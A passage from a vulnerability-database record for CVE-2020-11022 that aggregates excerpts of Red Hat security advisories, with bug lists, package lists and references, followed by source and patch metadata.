Bugs fixed (https://bugzilla.redhat.com/):\n\n1376706 - restore SerialNumber tag in caManualRenewal xml\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1406505 - KRA ECC installation failed with shared tomcat\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1666907 - CC: Enable AIA OCSP cert checking for entire cert chain\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection\n1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page\n1710171 - CVE-2019-10146 pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page\n1721684 - Rebase pki-servlet-engine to 9.0.30\n1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. \n1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA\n1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. 
\n1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page\n1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp\n1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server\n1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI\n1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak\n1824939 - JSS: add RSA PSS support - RHEL 8.3\n1824948 - add RSA PSS support - RHEL 8.3\n1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab [rhel-8]\n1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in 'path length' constraint field in CA's Agent page [rhel-8]\n1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password\n1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired=\"true\" but no secret\n1850004 - CVE-2020-11023 jquery: Passing HTML containing <option> elements to manipulation methods could result in untrusted code execution\n1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException\n1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing\n1855273 - CVE-2020-15720 pki: Dogtag's python client does not validate certificates\n1855319 - Not able to launch pkiconsole\n1856368 - kra-key-generate request is failing\n1857933 - CA Installation is failing with ncipher v12.30 HSM\n1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request\n1869893 - Common certificates are missing in CS.cfg on shared PKI instance\n1871064 - replica install failing during pki-ca component configuration\n1873235 - pki ca-user-cert-add with secure port failed with 
'SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT'\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 8):\n\nSource:\napache-commons-collections-3.2.2-10.module+el8.1.0+3366+6dfb954c.src.rpm\napache-commons-lang-2.6-21.module+el8.1.0+3366+6dfb954c.src.rpm\napache-commons-net-3.6-3.module+el8.3.0+6805+72837426.src.rpm\nbea-stax-1.2.0-16.module+el8.1.0+3366+6dfb954c.src.rpm\nglassfish-fastinfoset-1.2.13-9.module+el8.1.0+3366+6dfb954c.src.rpm\nglassfish-jaxb-2.2.11-11.module+el8.1.0+3366+6dfb954c.src.rpm\nglassfish-jaxb-api-2.2.12-8.module+el8.1.0+3366+6dfb954c.src.rpm\njackson-annotations-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm\njackson-core-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm\njackson-databind-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm\njackson-jaxrs-providers-2.9.9-1.module+el8.1.0+3832+9784644d.src.rpm\njackson-module-jaxb-annotations-2.7.6-4.module+el8.1.0+3366+6dfb954c.src.rpm\njakarta-commons-httpclient-3.1-28.module+el8.1.0+3366+6dfb954c.src.rpm\njavassist-3.18.1-8.module+el8.1.0+3366+6dfb954c.src.rpm\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.src.rpm\nldapjdk-4.22.0-1.module+el8.3.0+6784+6e1e4c62.src.rpm\npki-core-10.9.4-1.module+el8.3.0+8058+d5cd4219.src.rpm\npki-servlet-engine-9.0.30-1.module+el8.3.0+6730+8f9c6254.src.rpm\npython-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.src.rpm\nrelaxngDatatype-2011.1-7.module+el8.1.0+3366+6dfb954c.src.rpm\nresteasy-3.0.26-3.module+el8.2.0+5723+4574fbff.src.rpm\nslf4j-1.7.25-4.module+el8.1.0+3366+6dfb954c.src.rpm\nstax-ex-1.7.7-8.module+el8.2.0+5723+4574fbff.src.rpm\ntomcatjss-7.5.0-1.module+el8.3.0+7355+c59bcbd9.src.rpm\nvelocity-1.7-24.module+el8.1.0+3366+6dfb954c.src.rpm\nxalan-j2-2.7.1-38.module+el8.1.0+3366+6dfb954c.src.rpm\nxerces-j2-2.11.0-34.module+el8.1.0+3366+6dfb954c.src.rpm\nxml-commons-apis-1.4.01-25.module+el8.1.0+3366+6dfb954c.src.rpm\nxml-commons-resolver-1.2-26.module+el8.1.0+3366+6dfb954c.src.rpm\nxmlstreambuffer-1.5.4-8.module+el8.2.0+5723+4574fbff.src.rpm\nxsom-0-19.20110809svn.module+
el8.1.0+3366+6dfb954c.src.rpm\n\naarch64:\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\njss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\njss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\njss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npython-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm\npython-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm\npython3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm\npython3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm\n\nnoarch:\napache-commons-collections-3.2.2-10.module+el8.1.0+3366+6dfb954c.noarch.rpm\napache-commons-lang-2.6-21.module+el8.1.0+3366+6dfb954c.noarch.rpm\napache-commons-net-3.6-3.module+el8.3.0+6805+72837426.noarch.rpm\nbea-stax-api-1.2.0-16.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-fastinfoset-1.2.13-9.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-jaxb-api-2.2.12-8.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-jaxb-core-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-jaxb-runtime-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-jaxb-txw2-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm\njackson-annotations-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm\njackson-core-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm\njackson-databind-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm\njackson-jaxrs-json-provider-2.9.9-1.module+el8.1.0+3832+9784644d.noarch.rpm\njackson-jaxrs-providers-2.9.9-1.module+el8.1.0+3832+9784644d.noarch.rpm\njackson-module-jaxb-annotations-2.7
.6-4.module+el8.1.0+3366+6dfb954c.noarch.rpm\njakarta-commons-httpclient-3.1-28.module+el8.1.0+3366+6dfb954c.noarch.rpm\njavassist-3.18.1-8.module+el8.1.0+3366+6dfb954c.noarch.rpm\njavassist-javadoc-3.18.1-8.module+el8.1.0+3366+6dfb954c.noarch.rpm\nldapjdk-4.22.0-1.module+el8.3.0+6784+6e1e4c62.noarch.rpm\nldapjdk-javadoc-4.22.0-1.module+el8.3.0+6784+6e1e4c62.noarch.rpm\npki-base-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-base-java-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-ca-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-kra-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-server-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-servlet-4.0-api-9.0.30-1.module+el8.3.0+6730+8f9c6254.noarch.rpm\npki-servlet-engine-9.0.30-1.module+el8.3.0+6730+8f9c6254.noarch.rpm\npython3-pki-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\nrelaxngDatatype-2011.1-7.module+el8.1.0+3366+6dfb954c.noarch.rpm\nresteasy-3.0.26-3.module+el8.2.0+5723+4574fbff.noarch.rpm\nslf4j-1.7.25-4.module+el8.1.0+3366+6dfb954c.noarch.rpm\nslf4j-jdk14-1.7.25-4.module+el8.1.0+3366+6dfb954c.noarch.rpm\nstax-ex-1.7.7-8.module+el8.2.0+5723+4574fbff.noarch.rpm\ntomcatjss-7.5.0-1.module+el8.3.0+7355+c59bcbd9.noarch.rpm\nvelocity-1.7-24.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxalan-j2-2.7.1-38.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxerces-j2-2.11.0-34.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxml-commons-apis-1.4.01-25.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxml-commons-resolver-1.2-26.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxmlstreambuffer-1.5.4-8.module+el8.2.0+5723+4574fbff.noarch.rpm\nxsom-0-19.20110809svn.module+el8.1.0+3366+6dfb954c.noarch.rpm\n\nppc64le:\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\njss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\njss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\njss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm
\npki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npython-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm\npython-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm\npython3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm\npython3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm\n\ns390x:\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\njss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\njss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\njss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npython-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm\npython-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm\npython3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm\npython3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm\n\nx86_64:\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\njss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\njss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\njss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-symkey-debugin
fo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npython-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm\npython-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm\npython3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm\npython3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-9251\nhttps://access.redhat.com/security/cve/CVE-2016-10735\nhttps://access.redhat.com/security/cve/CVE-2018-14040\nhttps://access.redhat.com/security/cve/CVE-2018-14042\nhttps://access.redhat.com/security/cve/CVE-2019-8331\nhttps://access.redhat.com/security/cve/CVE-2019-10146\nhttps://access.redhat.com/security/cve/CVE-2019-10179\nhttps://access.redhat.com/security/cve/CVE-2019-10221\nhttps://access.redhat.com/security/cve/CVE-2019-11358\nhttps://access.redhat.com/security/cve/CVE-2020-1721\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/cve/CVE-2020-11023\nhttps://access.redhat.com/security/cve/CVE-2020-15720\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX6I3GNzjgjWX9erEAQiK8w//dJasljC8LcJheQtDfUXL+EG52rGjpyxU\nB5iSYariTDhQOFRt22udOjbdBaISRD77ozLdz0LusA1NBtR3hQ49ryIWyMUxLNsi\n46FLY44YxMY7uofZJExUJoEkN39CYwXqIOaaGnZ8mkn4QVdoKG+UBvBL3gKcE3uk\nh+PWQaasCHL96ZuLz5OB1ya0StcgVcnIDOJleP0f4TGI8w5LKSj1bdJz2fD1H+JP\niBa3QVedFanQpWVqCAjaw2lH+fQUB4F936XltKsqCKD9uaX1A2m+xAMZ8wuHcCUl\nNudj4LwT06xGd36tyQVh+0ZolB7aKmErYNicv25VNz1c/QlmXCiBJi3Y62/a7La0\nt8bGYPE01RTI1YvLs8c+Bw0SH+NcGPGtLw9Vd8w9hFYed7JUP6Iv9v/lSfbiUXDD\nR5gcEJPQtN2pRsqZaCmQCY2i9aNwjmyZ3wggmXJ4DtEy5adTmAmTL/Alf8kx1rfC\nUjfeBWVQ01QMIcwNCZM9ly6au06fioPjHhusCFPqPWnGCoT6mysF//ZOhLemUQci\necbYX+JbbUnbyWQPVIBhV/Zj4D6SqNtY5rciorwTedC8n2zX/8ORTCn1PZz8Oc1S\nebaoJI0TA2DuiUtPkKz1REcD8rnSCxPIhCYWfb4nIXKGjBINW8ueyG27VPprkSOh\n+Ybici9RaUE=VLtX\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. 
JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001\nJBEAP-23865 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001\nJBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001\nJBEAP-23927 - Tracker bug for the EAP 7.4.9 release for RHEL-8\nJBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001\nJBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001\nJBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001\nJBEAP-24100 - [GSS](7.4.z) Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001\nJBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value\nJBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001\nJBEAP-24132 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001\nJBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001\nJBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002\nJBEAP-24191 - [GSS](7.4.z) Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001\nJBEAP-24195 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001\nJBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003\nJBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2\nJBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001\nJBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001\n\n7. 
Description:\n\nSecurity Fix(es):\n\n* Addressed a security issue which can allow a malicious playbook author to\nelevate to the awx user from outside the isolated environment:\nCVE-2021-20253\n* Upgraded to a more recent version of nginx to address CVE-2019-20372\n* Upgraded to a more recent version of autobahn to address CVE-2020-35678\n* Upgraded to a more recent version of jquery to address CVE-2020-11022 and\nCVE-2020-11023\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor information on upgrading Ansible Tower, reference the Ansible Tower\nUpgrade and Migration Guide:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. Description:\n\nRed Hat Identity Management (IdM) is a centralized authentication, identity\nmanagement, and authorization solution for both traditional and cloud-based\nenterprise environments. \n\nThe following packages have been upgraded to a later upstream version: ipa\n(4.8.7), softhsm (2.6.0), opendnssec (2.1.6). 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1430365 - [RFE] Host-group names command rename\n1488732 - fake_mname in named.conf is no longer effective\n1585020 - Enable compat tree to provide information about AD users and groups on trust agents\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1651577 - [WebUI] IPA Error 3007: RequirmentError\" while adding members in \"User ID overrides\" tab\n1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute\n1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1701233 - [RFE] support setting supported signature methods on the token\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection\n1746830 - Memory leak during search of idview overrides\n1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch\n1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming\n1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI)\n1759888 - Rebase OpenDNSSEC to 2.1\n1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED\n1777806 - When Service weight is set as 0 for server in IPA location \"IPA Error 903: InternalError\" is displayed\n1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service\n1801698 - [RFE] Changing default hostgroup is too easy\n1802471 - SELinux policy for ipa-custodia\n1809835 - RFE: ipa group-add-member: number of failed should 
also be emphasized\n1810154 - RFE: ipa-backup should compare locally and globally installed server roles\n1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time\n1813330 - ipa-restore does not restart httpd\n1816784 - KRA install fails if all KRA members are Hidden Replicas\n1818765 - [Rebase] Rebase ipa to 4.8.6+\n1818877 - [Rebase] Rebase to softhsm 2.6.0+\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831732 - AVC avc: denied { dac_override } for comm=\"ods-enforcerd\n1831935 - AD authentication with IdM against SQL Server\n1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11\n1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings\n1834264 - BIND rebase: rebuild against new so version\n1834909 - softhsm use-after-free on process exit\n1845211 - Rebase bind-dyndb-ldap to 11.3\n1845537 - IPA bind configuration issue\n1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed'\n1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts\n1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7\n1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn\n1849914 - FreeIPA - Utilize 256-bit AJP connector passwords\n1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition\n1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2\n1853263 - ipa-selinux package missing\n1857157 - replica install failing with avc denial for custodia component\n1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master\n1859213 - AVC denial during ipa-adtrust-install --add-agents\n1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused'\n1863616 - CA-less install does not set required permissions on KDC 
certificate\n1866291 - EPN: enhance input validation\n1866938 - ipa-epn fails to retrieve user data if some user attributes are not present\n1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key'\n1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed'\n1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less\n1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain\n1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. \n1879604 - pkispawn logs files are empty\n\n6. Description:\n\n* Fixed two jQuery vulnerabilities (CVE-2020-11022, CVE-2020-11023)\n* Improved Ansible Tower's web service configuration to allow for\nprocessing more simultaneous HTTP(s) requests by default\n* Updated several dependencies of Ansible Tower's User Interface to address\n(CVE-2020-7720, CVE-2020-7743, CVE-2020-7676)\n* Updated to the latest version of python-psutil to address CVE-2019-18874\n* Added several optimizations to improve performance for a variety of\nhigh-load simultaneous job launch use cases\n* Fixed workflows to no longer prevent certain users from being able to\nedit approval nodes\n* Fixed confusing behavior for social auth logins across distinct browser\ntabs\n* Fixed launching of Job Templates that use prompt-at-launch Ansible Vault\ncredentials\n\n3", sources: [ { db: "NVD", id: "CVE-2020-11022", }, { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "160274", }, ], trust: 1.53, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: 
"CVE-2020-11022", trust: 1.7, }, { db: "PACKETSTORM", id: "162159", trust: 1.2, }, { db: "TENABLE", id: "TNS-2021-02", trust: 1.2, }, { db: "TENABLE", id: "TNS-2020-10", trust: 1.2, }, { db: "TENABLE", id: "TNS-2020-11", trust: 1.2, }, { db: "TENABLE", id: "TNS-2021-10", trust: 1.2, }, { db: "PACKETSTORM", id: "170823", trust: 0.2, }, { db: "PACKETSTORM", id: "159852", trust: 0.2, }, { db: "PACKETSTORM", id: "160274", trust: 0.2, }, { db: "PACKETSTORM", id: "159876", trust: 0.2, }, { db: "PACKETSTORM", id: "161727", trust: 0.2, }, { db: "PACKETSTORM", id: "171213", trust: 0.1, }, { db: "PACKETSTORM", id: "171214", trust: 0.1, }, { db: "PACKETSTORM", id: "171212", trust: 0.1, }, { db: "PACKETSTORM", id: "171215", trust: 0.1, }, { db: "PACKETSTORM", id: "170821", trust: 0.1, }, { db: "PACKETSTORM", id: "159275", trust: 0.1, }, { db: "PACKETSTORM", id: "159353", trust: 0.1, }, { db: "PACKETSTORM", id: "170819", trust: 0.1, }, { db: "PACKETSTORM", id: "168304", trust: 0.1, }, { db: "PACKETSTORM", id: "170817", trust: 0.1, }, { db: "PACKETSTORM", id: "158750", trust: 0.1, }, { db: "PACKETSTORM", id: "159513", trust: 0.1, }, { db: "PACKETSTORM", id: "157850", trust: 0.1, }, { db: "PACKETSTORM", id: "158555", trust: 0.1, }, { db: "CNNVD", id: "CNNVD-202004-2429", trust: 0.1, }, { db: "VULHUB", id: "VHN-163559", trust: 0.1, }, { db: "ICS CERT", id: "ICSA-22-055-02", trust: 0.1, }, { db: "VULMON", id: "CVE-2020-11022", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "160274", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, id: "VAR-202004-2191", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { 
db: "VULHUB", id: "VHN-163559", }, ], trust: 0.01, }, last_update_date: "2024-11-29T21:07:26.888000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Red Hat: Moderate: OpenShift Container Platform 3.11 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20202217 - Security Advisory", }, { title: "Debian Security Advisories: DSA-4693-1 drupal7 -- security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories&qid=978f239ce60a8a08c53eb64ba189d0f6", }, { title: "Red Hat: Moderate: Red Hat AMQ Interconnect 1.9.0 release and security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20204211 - Security Advisory", }, { title: "Red Hat: Moderate: Red Hat Virtualization security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20203807 - Security Advisory", }, { title: "Red Hat: Moderate: Red Hat OpenShift Service Mesh security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20202362 - Security Advisory", }, { title: "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7.4-1 - RHEL7 Container", trust: 0.1, 